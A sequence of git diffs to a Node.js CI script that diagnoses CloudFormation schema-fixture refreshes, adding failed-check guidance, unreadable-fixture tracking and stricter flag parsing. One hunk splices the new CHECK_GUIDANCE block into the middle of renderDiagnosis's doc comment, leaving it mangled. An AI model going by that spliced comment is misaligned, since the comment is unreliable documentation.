+  if (firstDivergent) {
+    const evidence = sdkModelsMember(
+      'CdkdVersionProbeOnly',
+      providerFiles.get(firstDivergent.resourceType)
+    );
+    if (evidence) {
+      const lag = sdkVersionLag(evidence.client, evidence.version);
+      if (lag) sdkLag = { client: evidence.client, ...lag };
+    }
+  }
+
+  process.stdout.write(
+    renderDiagnosis({
+      removed,
+      writableAdded,
+      readOnlyAddedCount,
+      divergences,
+      skipped,
+      sdkLag,
+    }) + '\n'
+  );
+}
+
+if (process.argv[1] === fileURLToPath(import.meta.url)) {
+  try {
+    main();
+  } catch (err) {
+    // A broken diagnosis must never take down the PR it describes.
+    process.stdout.write(
+      `_The automated diagnosis failed to run (${
+        err instanceof Error ? err.message : String(err)
+      }). Read the CI log for the failing checks._\n`
+    );
+  }
+}

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -36,7 +36,15 @@
  * Usage (from the repo root, AFTER the refresh has written the fixtures):
  *
  *   node scripts/diagnose-schema-refresh.mjs \
- *     [--coverage-log <file>] [--nested-key-log <file>] > body.md
+ *     [--nested-key-log <file>] [--nested-key-rc <status>] [--skipped-log <file>] > body.md
+ *
+ * `--nested-key-log` is the captured output of
+ * `vp run audit:nested-key-coverage:check` and `--nested-key-rc` its exit
+ * status. The status is what tells a checker that FAILED silently from one that
+ * found nothing, so the workflow always passes it; omitted, it is assumed to be
+ * 0, which is the right default for a by-hand run against a checker you just
+ * watched succeed. `--skipped-log` is the tail of the refresh's own output,
+ * listing the types the public bundle does not carry.
  *
  * Emits Markdown on stdout and always exits 0 — a diagnosis that fails must
  * not take down the PR it is describing.
@@ -133,10 +141,10 @@ export function comparePropertySets(committedJson, refreshedJson) {
  * @param {string} checkOutput
  * @param {number} [exitCode] the checker's own status; non-zero with nothing
  *   parsed is a failure however it worded itself
- * @returns {{divergences: Array<{resourceType: string, nestedKey: string, bucket: string, detail: string}>, unparsedFailure: boolean}}
+ * @returns {{divergences: NestedKeyDivergence[], unparsedFailure: boolean}}
  */
 export function parseNestedKeyDivergences(checkOutput, exitCode = 0) {
-  /** @type {Array<{resourceType: string, nestedKey: string, bucket: string, detail: string}>} */
+  /** @type {NestedKeyDivergence[]} */
   const divergences = [];
   for (const raw of checkOutput.split('\n')) {
     const line = raw.trim();
@@ -309,7 +317,7 @@ export function findDeclarationCandidates(
  * @param {string} property
  * @param {string | undefined} providerRelPath
  * @param {string} [repoRoot]
- * @returns {{client: string, modelled: boolean, version?: string, consulted?: string[]} | undefined}
+ * @returns {SdkEvidence | undefined}
  *   `undefined` when no client could be determined — the honest answer, not a guess
  */
 export function sdkModelsMember(property, providerRelPath, repoRoot = REPO_ROOT) {
@@ -391,11 +399,16 @@ export function clientsForType(resourceType, rows) {
   // A provider importing exactly ONE client leaves nothing for the name test to
   // disambiguate — that client IS the type's own, whatever it is called. This
   // arm is what keeps the hedge off the services whose client is named
-  // differently: measured over the 134 registered types, the name test matches
-  // 119, this arm settles 10 more (`AWS::Events::Rule` /
-  // `@aws-sdk/client-eventbridge` among them), and 3 are genuinely ambiguous —
-  // a provider importing several clients, none named for the service.
-  return rows.map((r) => ({ ...r, matched: rows.length === 1 }));
+  // differently: of the 134 registered types, 2 reach no client at all and of
+  // the remaining 132 the name test matches 119, this arm settles 10 more
+  // (`AWS::Events::Rule` / `@aws-sdk/client-eventbridge` among them, all 10
+  // verified to be the service's own), and 3 are genuinely ambiguous — a
+  // provider importing several clients, none named for the service.
+  //
+  // `service` empty means the type name did not parse, and one row must NOT be
+  // asserted to match it: unreachable from a divergence line today, but the
+  // arm would be claiming a match it never tested.
+  return rows.map((r) => ({ ...r, matched: service !== '' && rows.length === 1 }));
 }
 
 /**
@@ -701,7 +714,7 @@ export function renderDiagnosis({
     // is honest — both were tried, and the second is the exact silent-clean
     // verdict the whole job exists to prevent.
     lines.push(
-      '### The nested-key check FAILED in a mode this report cannot read',
+      '### The nested-key check reported something this report could not read',
       '',
       'It failed, or dropped findings, without printing lines this parser could',
       'read. That is one of its non-divergence refusals (a stale',
@@ -709,8 +722,9 @@ export function renderDiagnosis({
       'real decision, and each exactly what a schema refresh causes), a change to',
       'its output format, or a checker that never ran at all (a missing task, a',
       'crash, an OOM kill — the case its exit code is the only evidence of).',
-      '**Read the failing job log before merging**; the sections below are still',
-      'accurate for everything other than nested keys.',
+      '**Read that job\u2019s log before merging.** Any nested-key divergences listed',
+      'above are the ones that DID parse, so treat that list as incomplete; every',
+      'other section is unaffected.',
       '',
       '```bash',
       'vp run audit:nested-key-coverage:check',
@@ -1164,8 +1178,15 @@ function main() {
   // still exists, by the workflow test asserting it passes the variable.
   const readNumArg = (/** @type {string} */ flag) => {
     const i = args.indexOf(flag);
-    if (i === -1 || i + 1 >= args.length) return 0;
-    const n = Number(args[i + 1]);
+    if (i === -1) return 0;
+    // A flag that IS present must carry a readable value. `Number('')` and
+    // `Number(' ')` are both 0 — "the checker succeeded" — so the empty, the
+    // whitespace and the trailing-flag spellings all failed OPEN while only
+    // NaN failed closed. Three spellings of the same defect this file has now
+    // shipped twice.
+    const raw = args[i + 1];
+    if (raw === undefined || raw.trim() === '') return 1;
+    const n = Number(raw);
     return Number.isFinite(n) ? n : 1;
   };
   const nestedKey = parseNestedKeyDivergences(

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -36,14 +36,18 @@
  * Usage (from the repo root, AFTER the refresh has written the fixtures):
  *
  *   node scripts/diagnose-schema-refresh.mjs \
- *     [--nested-key-log <file>] [--nested-key-rc <status>] [--skipped-log <file>] > body.md
+ *     [--nested-key-log <file>] [--nested-key-rc <status>] \\
+ *     [--property-coverage-rc <status>] [--skipped-log <file>] > body.md
  *
  * `--nested-key-log` is the captured output of
  * `vp run audit:nested-key-coverage:check` and `--nested-key-rc` its exit
  * status. The status is what tells a checker that FAILED silently from one that
  * found nothing, so the workflow always passes it; omitted, it is assumed to be
  * 0, which is the right default for a by-hand run against a checker you just
- * watched succeed. `--skipped-log` is the tail of the refresh's own output,
+ * watched succeed. `--property-coverage-rc` is the same for
+ * `vp test run property-coverage`, whose red is reached by an ordinary schema
+ * ADDITION re-adding a property some provider wrote off.
+ * `--skipped-log` is the tail of the refresh's own output,
  * listing the types the public bundle does not carry.
  *
  * Emits Markdown on stdout and always exits 0 — a diagnosis that fails must
@@ -61,6 +65,7 @@ const REPO_ROOT = join(__dirname, '..');
 /**
  * @typedef {import('./diagnose-schema-refresh.d.mts').NestedKeyDivergence} NestedKeyDivergence
  * @typedef {import('./diagnose-schema-refresh.d.mts').SdkLagRow} SdkLagRow
+ * @typedef {import('./diagnose-schema-refresh.d.mts').DiagnosisInput} DiagnosisInput
  * @typedef {import('./diagnose-schema-refresh.d.mts').SdkEvidence} SdkEvidence
  * @typedef {import('./diagnose-schema-refresh.d.mts').RemovedEntry} RemovedEntry
  * @typedef {import('./diagnose-schema-refresh.d.mts').AddedEntry} AddedEntry
@@ -589,31 +594,40 @@ export function parseDeclaredProperties(generatedSource) {
  * problem, silently. Evidence shortens the human's work; it does not change who
  * accepts that risk.
  *
- * @param {object} input
- * @param {RemovedEntry[]} input.removed
- * @param {AddedEntry[]} input.writableAdded
- * @param {number} [input.readOnlyAddedCount]
- * @param {SdkLagRow[]} [input.sdkLag]
- * @param {boolean} [input.nestedKeyUnparsed]
- * @param {NestedKeyDivergence[]} input.divergences
- * @param {string[]} input.skipped
+ * The input shape lives in the sibling `.d.mts` and is named here rather than
+ * restated field by field: the per-field `@param` list was a second copy, and
+ * it went stale twice — silently, since nothing in CI type-checks `scripts/**`.
+ *
+ * @param {DiagnosisInput} input
  * @returns {string}
  */
-export function renderDiagnosis({
-  removed,
-  writableAdded,
-  readOnlyAddedCount = 0,
-  divergences,
-  nestedKeyUnparsed = false,
-  skipped,
-  sdkLag,
-}) {
+export function renderDiagnosis(input) {
+  const {
+    removed,
+    writableAdded,
+    readOnlyAddedCount = 0,
+    divergences,
+    nestedKeyUnparsed = false,
+    propertyCoverageFailed = false,
+    unreadable = [],
+    skipped,
+    sdkLag,
+  } = input;
   const lines = ['## What changed, and what needs a decision', ''];
 
-  // `nestedKeyUnparsed` is part of the condition, not just a section below it:
-  // a checker that FAILED in a mode this report cannot read is the one state
-  // where "additions only" is a confident wrong answer rather than a gap.
-  if (removed.length === 0 && divergences.length === 0 && !nestedKeyUnparsed) {
+  // Both checker verdicts are part of the condition, not just sections below
+  // it: a checker that failed is the one state where "additions only" is a
+  // confident WRONG answer rather than a gap. `propertyCoverageFailed` was the
+  // sibling left out — its status was discarded by the workflow, so a red
+  // `property-coverage` rendered as clean, on the ordinary refresh shape (see
+  // its section below).
+  if (
+    removed.length === 0 &&
+    divergences.length === 0 &&
+    !nestedKeyUnparsed &&
+    !propertyCoverageFailed &&
+    unreadable.length === 0
+  ) {
     lines.push('Nothing in this refresh needs a decision — additions only.', '');
   }
 
@@ -733,6 +747,36 @@ export function renderDiagnosis({
     );
   }
 
+  if (propertyCoverageFailed) {
+    // Reached by a pure schema ADDITION, which is the ordinary refresh shape:
+    // the coverage test fails when AWS RE-ADDS a property some provider had
+    // written off in `bogusTolerated`. Measured against the live tree, 12 such
+    // properties across 10 types are one AWS addition away from this. Removing
+    // a hand-written rationale is a judgment, so it is a hand-off — and until
+    // this section existed the report called that same property "no decision
+    // needed" and posted it to the backfill umbrella as newly unaccounted.
+    lines.push(
+      '### The property-coverage check FAILED — a decision is needed',
+      '',
+      'Most often this is AWS RE-ADDING a property that a provider had written',
+      'off with a `bogusTolerated` rationale in',
+      '`tests/fixtures/cfn-schemas/_todo-backfill.json`. The rationale said the',
+      'schema no longer lists it; the schema lists it again, so the rationale is',
+      'now wrong and retiring it is a judgment this job will not make for you.',
+      '',
+      '```bash',
+      '# Names every entry the check is unhappy about.',
+      'vp test run property-coverage',
+      '```',
+      '',
+      'Delete the stale `bogusTolerated` entry and account for the property',
+      'normally — `handledProperties` if the provider wires it, `unhandledByDesign`',
+      'with a reason if it does not. **Any property named there is NOT covered by',
+      'the sections below**, whichever one it appears in.',
+      ''
+    );
+  }
+
   if (writableAdded.length > 0) {
     const count = writableAdded.reduce((n, e) => n + e.properties.length, 0);
     lines.push(
@@ -755,10 +799,31 @@ export function renderDiagnosis({
     // Named even though there is nothing to do, because they ARE visible in the
     // fixture diff and an unexplained change invites a reader to go looking.
     lines.push(
-      `### Read-only properties AWS added (${readOnlyAddedCount}) — nothing to do`,
+      `### Read-only properties AWS added (${readOnlyAddedCount}) — usually nothing to do`,
       '',
-      'Visible in the fixture diff, but AWS computes and returns these; there is',
-      'nothing for a provider to send, so they can never be a dropped value.',
+      'AWS computes and returns these, so there is nothing for a provider to send',
+      'and they can never be a dropped value. One case is not a no-op, and it is',
+      'reachable only this way: a new read-only `*Arn` or `*Url` attribute on a',
+      'type that had none makes `audit:sdk-attr-coverage:check` fail, because a',
+      'cross-resource `Fn::GetAtt` would find no cached attribute to read. If that',
+      'check is red on this PR, the cause is in this list.',
+      ''
+    );
+  }
+
+  if (unreadable.length > 0) {
+    // Distinct from "not refreshed": the bundle DID carry these, and this
+    // report could not read one side of the comparison. A type in here is
+    // absent from the removal and the addition accounting alike, so the
+    // sections above are silent about it rather than clean.
+    lines.push(
+      `### Fixtures this report could not read (${unreadable.length})`,
+      '',
+      'Neither their removals nor their additions are accounted for above. The',
+      'refresh itself is the place to look — a fixture it half-wrote reads like',
+      'this here.',
+      '',
+      ...unreadable.map((/** @type {string} */ f) => `- ${renderName(f.replace(/\.json$/, ''))}`),
       ''
     );
   }
@@ -1079,6 +1144,107 @@ export function buildSdkLag(divergences, clientsFor, versionLag = sdkVersionLag)
   return out;
 }
 
+/**
+ * Walk the refreshed fixtures and split them into what needs a decision.
+ *
+ * Extracted from `main()` for the reason `buildSdkLag` was: everything here was
+ * reachable only through it, `main()` has no unit coverage, and the one branch
+ * that mattered — a fixture whose comparison THREW — could be deleted with the
+ * whole suite green. That branch is not decoration: a type that throws vanishes
+ * from the removal AND the addition accounting at once, so the residue reads as
+ * "additions only" rather than as silent. It cannot be reached through a
+ * directory seam either, since `committedOf` reads git HEAD and a scratch
+ * fixture has no committed side to compare against.
+ *
+ * The readers are injected; nothing here touches the filesystem.
+ *
+ * @param {{
+ *   files: string[],
+ *   committedOf: (file: string) => string | undefined,
+ *   currentOf: (file: string) => string,
+ *   providerFiles: Map<string, string>,
+ *   declared: Map<string, Set<string>>,
+ *   declarationCandidates?: typeof findDeclarationCandidates,
+ *   sdkEvidence?: typeof sdkModelsMember,
+ * }} input
+ * @returns {{removed: RemovedEntry[], writableAdded: AddedEntry[], readOnlyAddedCount: number, unreadable: string[]}}
+ */
+export function collectFixtureDeltas({
+  files,
+  committedOf,
+  currentOf,
+  providerFiles,
+  declared,
+  declarationCandidates = findDeclarationCandidates,
+  sdkEvidence = sdkModelsMember,
+}) {
+  /** @type {RemovedEntry[]} */
+  const removed = [];
+  /** @type {AddedEntry[]} */
+  const writableAdded = [];
+  /** @type {string[]} */
+  const unreadable = [];
+  let readOnlyAddedCount = 0;
+
+  for (const file of files) {
+      const committed = committedOf(file);
+      if (committed === undefined) continue; // Brand-new fixture: nothing to compare.
+      let delta;
+      let resourceType;
+      try {
+        delta = comparePropertySets(committed, currentOf(file));
+        resourceType = JSON.parse(committed).resourceType ?? file;
+      } catch {
+        // An unparseable side is the refresh's problem, not the report's — but it
+        // is COUNTED, because a type that vanishes here vanishes from the removal
+        // AND the addition accounting, and the residue can be "additions only".
+        // The other two parsers grew shortfall counters in earlier rounds; this
+        // one was the last silent skip.
+        unreadable.push(file);
+        continue;
+      }
+
+      readOnlyAddedCount += delta.added.length - delta.writableAdded.length;
+
+      const providerRelPath = providerFiles.get(resourceType);
+      const declaredHere = declared.get(resourceType) ?? new Set();
+      const actionable = delta.removed.filter((/** @type {string} */ p) => declaredHere.has(p));
+      if (actionable.length > 0) {
+        /** @type {Record<string, string[]>} */
+        const candidates = {};
+        /** @type {Record<string, SdkEvidence | undefined>} */
+        const sdk = {};
+        /** @type {Record<string, string[]>} */
+        const renameCandidates = {};
+        for (const property of actionable) {
+          candidates[property] = declarationCandidates(property, providerRelPath, resourceType);
+          sdk[property] = sdkEvidence(property, providerRelPath);
+          // Writable additions that plausibly ARE this property renamed —
+          // one name containing the other. Unconditional pairing asserted a
+          // rename for every unrelated addition, and with two removals and one
+          // addition it claimed both, of which at most one can be true.
+          // Read-only additions are excluded outright: a declaration cannot
+          // target one, so "point the declaration at the new name" would just
+          // produce the next bogus entry.
+          renameCandidates[property] = pairRenames(property, delta.writableAdded);
+        }
+        removed.push({
+          resourceType,
+          properties: actionable,
+          candidates,
+          sdk,
+          renameCandidates,
+          providerPath: providerRelPath,
+        });
+      }
+      if (delta.writableAdded.length > 0) {
+        writableAdded.push({ resourceType, properties: delta.writableAdded });
+      }
+    }
+
+  return { removed, writableAdded, readOnlyAddedCount, unreadable };
+}
+
 function main() {
   const args = process.argv.slice(2);
   const readArg = (/** @type {string} */ flag) => {
@@ -1108,64 +1274,13 @@ function main() {
       : ''
   );
 
-  /** @type {RemovedEntry[]} */
-  const removed = [];
-  /** @type {AddedEntry[]} */
-  const writableAdded = [];
-  let readOnlyAddedCount = 0;
-
-  for (const file of readdirSync(FIXTURES_DIR).filter(
-    (f) => f.endsWith('.json') && !f.startsWith('_')
-  )) {
-    const relPath = `tests/fixtures/cfn-schemas/${file}`;
-    const committed = committedVersion(relPath);
-    if (committed === undefined) continue; // Brand-new fixture: nothing to compare.
-    let delta;
-    let resourceType;
-    try {
-      delta = comparePropertySets(committed, readFileSync(join(FIXTURES_DIR, file), 'utf8'));
-      resourceType = JSON.parse(committed).resourceType ?? file;
-    } catch {
-      continue; // An unparseable side is the refresh's problem, not the report's.
-    }
-
-    readOnlyAddedCount += delta.added.length - delta.writableAdded.length;
-
-    const providerRelPath = providerFiles.get(resourceType);
-    const declaredHere = declared.get(resourceType) ?? new Set();
-    const actionable = delta.removed.filter((/** @type {string} */ p) => declaredHere.has(p));
-    if (actionable.length > 0) {
-      /** @type {Record<string, string[]>} */
-      const candidates = {};
-      /** @type {Record<string, SdkEvidence | undefined>} */
-      const sdk = {};
-      /** @type {Record<string, string[]>} */
-      const renameCandidates = {};
-      for (const property of actionable) {
-        candidates[property] = findDeclarationCandidates(property, providerRelPath, resourceType);
-        sdk[property] = sdkModelsMember(property, providerRelPath);
-        // Writable additions that plausibly ARE this property renamed —
-        // one name containing the other. Unconditional pairing asserted a
-        // rename for every unrelated addition, and with two removals and one
-        // addition it claimed both, of which at most one can be true.
-        // Read-only additions are excluded outright: a declaration cannot
-        // target one, so "point the declaration at the new name" would just
-        // produce the next bogus entry.
-        renameCandidates[property] = pairRenames(property, delta.writableAdded);
-      }
-      removed.push({
-        resourceType,
-        properties: actionable,
-        candidates,
-        sdk,
-        renameCandidates,
-        providerPath: providerRelPath,
-      });
-    }
-    if (delta.writableAdded.length > 0) {
-      writableAdded.push({ resourceType, properties: delta.writableAdded });
-    }
-  }
+  const { removed, writableAdded, readOnlyAddedCount, unreadable } = collectFixtureDeltas({
+    files: readdirSync(FIXTURES_DIR).filter((f) => f.endsWith('.json') && !f.startsWith('_')),
+    committedOf: (file) => committedVersion(`tests/fixtures/cfn-schemas/${file}`),
+    currentOf: (file) => readFileSync(join(FIXTURES_DIR, file), 'utf8'),
+    providerFiles,
+    declared,
+  });
 
   // An UNREADABLE status is not a successful one: a mistyped value used to
   // return 0 — "the checker succeeded" — silently restoring the behaviour where
@@ -1193,6 +1308,7 @@ function main() {
     readArg('--nested-key-log'),
     readNumArg('--nested-key-rc')
   );
+  const propertyCoverageFailed = readNumArg('--property-coverage-rc') !== 0;
   const divergences = nestedKey.divergences;
   const skipped = readArg('--skipped-log')
     .split('\n')
@@ -1213,6 +1329,8 @@ function main() {
       readOnlyAddedCount,
       divergences,
       nestedKeyUnparsed: nestedKey.unparsedFailure,
+      propertyCoverageFailed,
+      unreadable,
       skipped,
       sdkLag,
     }) + '\n'

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -61,7 +61,7 @@
 
 import { execFileSync } from 'node:child_process';
 import { readFileSync, readdirSync, existsSync, statSync } from 'node:fs';
-import { join, dirname } from 'node:path';
+import { join, dirname, relative } from 'node:path';
 import { fileURLToPath } from 'node:url';
 
 const __dirname = dirname(fileURLToPath(import.meta.url));
@@ -1620,7 +1620,10 @@ function main() {
   assertFixtureFloor(fixtureFiles.length, declared.size);
   const { removed, writableAdded, readOnlyAddedCount, unreadable } = collectFixtureDeltas({
     files: fixtureFiles,
-    committedOf: (file) => committedVersion(`tests/fixtures/cfn-schemas/${file}`),
+    // Follows the seam too. Leaving this hard-coded while `currentOf` moved is
+    // harmless for the empty directory the test uses, and wrong for any other:
+    // it would diff scratch content against the real committed fixtures.
+    committedOf: (file) => committedVersion(`${relative(REPO_ROOT, fixturesDir)}/${file}`),
     currentOf: (file) => readFileSync(join(fixturesDir, file), 'utf8'),
     providerFiles,
     declared,

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -1447,20 +1447,43 @@ function main() {
   // through to the permissive arms and rendered the clean verdict. A guard
   // covering fewer spellings than its subject accepts is the shape this whole
   // file kept producing.
+  /** @type {string[]} */
   const unknown = [];
+  /** @type {string[]} */
+  const repeated = [];
+  const seen = new Set();
   for (let i = 0; i < args.length; i++) {
     const a = args[i];
-    if (KNOWN_FLAGS.some((flag) => a.startsWith(`${flag}=`))) continue;
-    if (KNOWN_FLAGS.includes(a)) {
-      // Its value is consumed only if it could BE one. A dash-leading token is
-      // not a value here — that is the same rule `rawArg` applies — so
-      // consuming it blindly would let `--failed-checks --skipped-log <path>`
-      // swallow the second flag and report the PATH as the unknown argument.
-      const next = args[i + 1];
-      if (next !== undefined && !next.startsWith('-')) i += 1;
+    // One classification per token, so the glued and space spellings take the
+    // SAME path — an earlier revision `continue`d on the glued form before the
+    // repeat check and `--nested-key-rc=0 --nested-key-rc=3` still rendered
+    // clean.
+    const flag = KNOWN_FLAGS.find((f) => a === f || a.startsWith(`${f}=`));
+    if (flag === undefined) {
+      unknown.push(a);
       continue;
     }
-    unknown.push(a);
+    // A REPEAT is not a valid invocation: `rawArg` takes the FIRST match, so
+    // the later value is silently discarded — which rendered the clean verdict
+    // over an rc=3 checker, the last argv shape that still reached a confident
+    // answer.
+    if (seen.has(flag)) repeated.push(flag);
+    seen.add(flag);
+    if (a === flag) {
+      // Its value is consumed only if it could BE one. A dash-leading token is
+      // not a value here — the same rule `rawArg` applies — so consuming it
+      // blindly would let `--failed-checks --skipped-log <path>` swallow the
+      // second flag and report the PATH as the unknown argument.
+      const next = args[i + 1];
+      if (next !== undefined && !next.startsWith('-')) i += 1;
+    }
+  }
+  if (repeated.length > 0) {
+    throw new Error(
+      `flag(s) given more than once: ${[...new Set(repeated)].join(', ')} — only the first ` +
+        'would have been read. Refusing to report from an invocation this script did not ' +
+        'understand.'
+    );
   }
   if (unknown.length > 0) {
     throw new Error(

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -63,6 +63,13 @@ const __dirname = dirname(fileURLToPath(import.meta.url));
 const REPO_ROOT = join(__dirname, '..');
 
 /**
+ * Distinguishes "this fixture is not in HEAD" (nothing to compare — a brand-new
+ * capture) from "reading it FAILED". Both used to be `undefined`, and the
+ * second is a fact the report must state rather than skip.
+ */
+export const UNREADABLE = Symbol('unreadable');
+
+/**
  * @typedef {import('./diagnose-schema-refresh.d.mts').NestedKeyDivergence} NestedKeyDivergence
  * @typedef {import('./diagnose-schema-refresh.d.mts').SdkLagRow} SdkLagRow
  * @typedef {import('./diagnose-schema-refresh.d.mts').DiagnosisInput} DiagnosisInput
@@ -596,7 +603,63 @@ export function parseDeclaredProperties(generatedSource) {
  *
  * The input shape lives in the sibling `.d.mts` and is named here rather than
  * restated field by field: the per-field `@param` list was a second copy, and
- * it went stale twice — silently, since nothing in CI type-checks `scripts/**`.
+ * it went stale twice — silently, since nothing in CI type-checks `scripts/**
+ * What to do about each CI check a schema refresh can turn red.
+ *
+ * Keyed by the `vp run` task name, so the workflow and this table name the same
+ * thing. Every entry here is a check that READS `tests/fixtures/cfn-schemas/`
+ * and hard-fails CI, which is what makes its silence expensive: two of the
+ * three are reddened by a pure schema ADDITION, the shape a reader is most
+ * likely to wave through.
+ *
+ * A check absent from this table still gets a section — naming it and saying
+ * there is no guidance beats the silence that shipped for six rounds.
+ */
+/** @type {Record<string, string[]>} */
+export const CHECK_GUIDANCE = {
+  'property-coverage': [
+    'Most often AWS RE-ADDED a property a provider had written off with a',
+    '`bogusTolerated` rationale in `tests/fixtures/cfn-schemas/_todo-backfill.json`.',
+    'The rationale said the schema no longer lists it; it does again, so the',
+    'rationale is now wrong and retiring it is a judgement.',
+    '',
+    '```bash',
+    'vp test run property-coverage',
+    '```',
+    '',
+    'Delete the stale entry and account for the property normally —',
+    '`handledProperties` if the provider wires it, `unhandledByDesign` with a',
+    'reason if it does not.',
+  ],
+  'audit:sdk-attr-coverage:check': [
+    'A new READ-ONLY `*Arn` or `*Url` attribute on a type that had none. A',
+    'cross-resource `Fn::GetAtt` reads the cached attribute, so an uncached one',
+    'hard-fails the resolver rather than falling back.',
+    '',
+    '```bash',
+    'vp run audit:sdk-attr-coverage:check',
+    '```',
+    '',
+    'Cache the attribute in the provider under its CFn name, or — if the type',
+    'is Cloud-Control-routed — check whether its `primaryIdentifier` already',
+    'covers it.',
+  ],
+  'audit:enrichment-coverage:check': [
+    'A new computed attribute on a pure Cloud-Control type that',
+    '`enrichResourceAttributes` does not populate — the silent-drop class on the',
+    'READ side.',
+    '',
+    '```bash',
+    'vp run audit:enrichment-coverage:check',
+    '```',
+    '',
+    'Add the attribute to that type\'s `case` in',
+    '`src/provisioning/cloud-control-provider.ts`, or allow-list it with a',
+    'rationale if AWS does not return it.',
+  ],
+};
+
+/**`.
  *
  * @param {DiagnosisInput} input
  * @returns {string}
@@ -608,7 +671,7 @@ export function renderDiagnosis(input) {
     readOnlyAddedCount = 0,
     divergences,
     nestedKeyUnparsed = false,
-    propertyCoverageFailed = false,
+    failedChecks = [],
     unreadable = [],
     skipped,
     sdkLag,
@@ -625,7 +688,7 @@ export function renderDiagnosis(input) {
     removed.length === 0 &&
     divergences.length === 0 &&
     !nestedKeyUnparsed &&
-    !propertyCoverageFailed &&
+    failedChecks.length === 0 &&
     unreadable.length === 0
   ) {
     lines.push('Nothing in this refresh needs a decision — additions only.', '');
@@ -747,32 +810,28 @@ export function renderDiagnosis(input) {
     );
   }
 
-  if (propertyCoverageFailed) {
-    // Reached by a pure schema ADDITION, which is the ordinary refresh shape:
-    // the coverage test fails when AWS RE-ADDS a property some provider had
-    // written off in `bogusTolerated`. Measured against the live tree, 12 such
-    // properties across 10 types are one AWS addition away from this. Removing
-    // a hand-written rationale is a judgment, so it is a hand-off — and until
-    // this section existed the report called that same property "no decision
-    // needed" and posted it to the backfill umbrella as newly unaccounted.
+  if (failedChecks.length > 0) {
+    // A LIST rather than a flag per check, because the flag-per-check shape
+    // recurred once per review round: `property-coverage`'s red was discarded
+    // for six of them, and closing that left `sdk-attr-coverage` and
+    // `enrichment-coverage` — both fixture-driven, both CI-blocking, both
+    // reachable by an ordinary schema ADDITION — reporting nothing. The next
+    // one is a row in `CHECK_GUIDANCE` and a line in the workflow.
+    lines.push('### CI checks that FAILED — a decision is needed', '');
+    for (const check of failedChecks) {
+      const guidance = CHECK_GUIDANCE[check];
+      lines.push(`#### \`${renderName(check)}\``, '');
+      lines.push(
+        ...(guidance ?? [
+          'This report carries no guidance for that check — read its job log.',
+          'Whatever it names is NOT covered by the sections below.',
+        ]),
+        ''
+      );
+    }
     lines.push(
-      '### The property-coverage check FAILED — a decision is needed',
-      '',
-      'Most often this is AWS RE-ADDING a property that a provider had written',
-      'off with a `bogusTolerated` rationale in',
-      '`tests/fixtures/cfn-schemas/_todo-backfill.json`. The rationale said the',
-      'schema no longer lists it; the schema lists it again, so the rationale is',
-      'now wrong and retiring it is a judgment this job will not make for you.',
-      '',
-      '```bash',
-      '# Names every entry the check is unhappy about.',
-      'vp test run property-coverage',
-      '```',
-      '',
-      'Delete the stale `bogusTolerated` entry and account for the property',
-      'normally — `handledProperties` if the provider wires it, `unhandledByDesign`',
-      'with a reason if it does not. **Any property named there is NOT covered by',
-      'the sections below**, whichever one it appears in.',
+      '**Anything those checks name is NOT covered by the sections below**,',
+      'whichever section it appears in.',
       ''
     );
   }
@@ -823,7 +882,15 @@ export function renderDiagnosis(input) {
       'refresh itself is the place to look — a fixture it half-wrote reads like',
       'this here.',
       '',
-      ...unreadable.map((/** @type {string} */ f) => `- ${renderName(f.replace(/\.json$/, ''))}`),
+      // `refresh-cfn-schemas.mjs` writes `AWS::S3::Bucket` as `AWS-S3-Bucket.json`,
+      // and `renderName`'s class excludes `-` — so rendering the raw stem put
+      // all 134 possible names through the rejection placeholder and the
+      // maintainer got a count with no types. Restored to the type spelling,
+      // which is also what every other section renders.
+      ...unreadable.map(
+        (/** @type {string} */ f) =>
+          `- ${renderName(f.replace(/\.json$/, '').replace(/-/g, '::'))}`
+      ),
       ''
     );
   }
@@ -1083,7 +1150,7 @@ function divergenceProcedure(divergences, sdkLag) {
  * Read a type's committed fixture from git, or `undefined` when it is new.
  *
  * @param {string} relPath
- * @returns {string | undefined}
+ * @returns {string | undefined | typeof UNREADABLE}
  */
 function committedVersion(relPath) {
   try {
@@ -1092,8 +1159,18 @@ function committedVersion(relPath) {
       encoding: 'utf8',
       maxBuffer: 32 * 1024 * 1024,
     });
-  } catch {
-    return undefined;
+  } catch (/** @type {any} */ error) {
+    // "not in HEAD" is a brand-new fixture and means nothing to compare. Any
+    // OTHER failure — git absent, a broken repo, the 32 MB buffer exceeded — is
+    // this report failing to read, and collapsing the two made every fixture
+    // look new and the whole refresh look clean. Measured: every file
+    // undefined yields the clean verdict, over a step that only runs when
+    // drift exists.
+    const stderr = String(error?.stderr ?? '');
+    if (/does not exist|exists on disk, but not in|unknown revision|invalid object/i.test(stderr)) {
+      return undefined;
+    }
+    return UNREADABLE;
   }
 }
 
@@ -1160,7 +1237,7 @@ export function buildSdkLag(divergences, clientsFor, versionLag = sdkVersionLag)
  *
  * @param {{
  *   files: string[],
- *   committedOf: (file: string) => string | undefined,
+ *   committedOf: (file: string) => string | undefined | typeof UNREADABLE,
  *   currentOf: (file: string) => string,
  *   providerFiles: Map<string, string>,
  *   declared: Map<string, Set<string>>,
@@ -1188,6 +1265,10 @@ export function collectFixtureDeltas({
 
   for (const file of files) {
       const committed = committedOf(file);
+      if (committed === UNREADABLE) {
+        unreadable.push(file);
+        continue;
+      }
       if (committed === undefined) continue; // Brand-new fixture: nothing to compare.
       let delta;
       let resourceType;
@@ -1245,6 +1326,32 @@ export function collectFixtureDeltas({
   return { removed, writableAdded, readOnlyAddedCount, unreadable };
 }
 
+/**
+ * The coverage table, refusing a MISSING module rather than reading it as empty.
+ *
+ * `parseDeclaredProperties('')` returns an empty map without throwing — the
+ * by-hand case — so the caller's `existsSync(...) ? read : ''` turned an absent
+ * file into "no provider declares anything", which filters every removal away
+ * and renders the clean verdict. Measured on a real
+ * `AWS::Route53::RecordSet.GeoProximityLocation` removal.
+ *
+ * Split out of `main()` so the refusal is reachable from a test; every other
+ * refusal in this file already was.
+ *
+ * @param {string} [repoRoot]
+ * @returns {Map<string, Set<string>>}
+ */
+export function loadDeclaredProperties(repoRoot = REPO_ROOT) {
+  const generatedPath = join(repoRoot, 'src/provisioning/property-coverage.generated.ts');
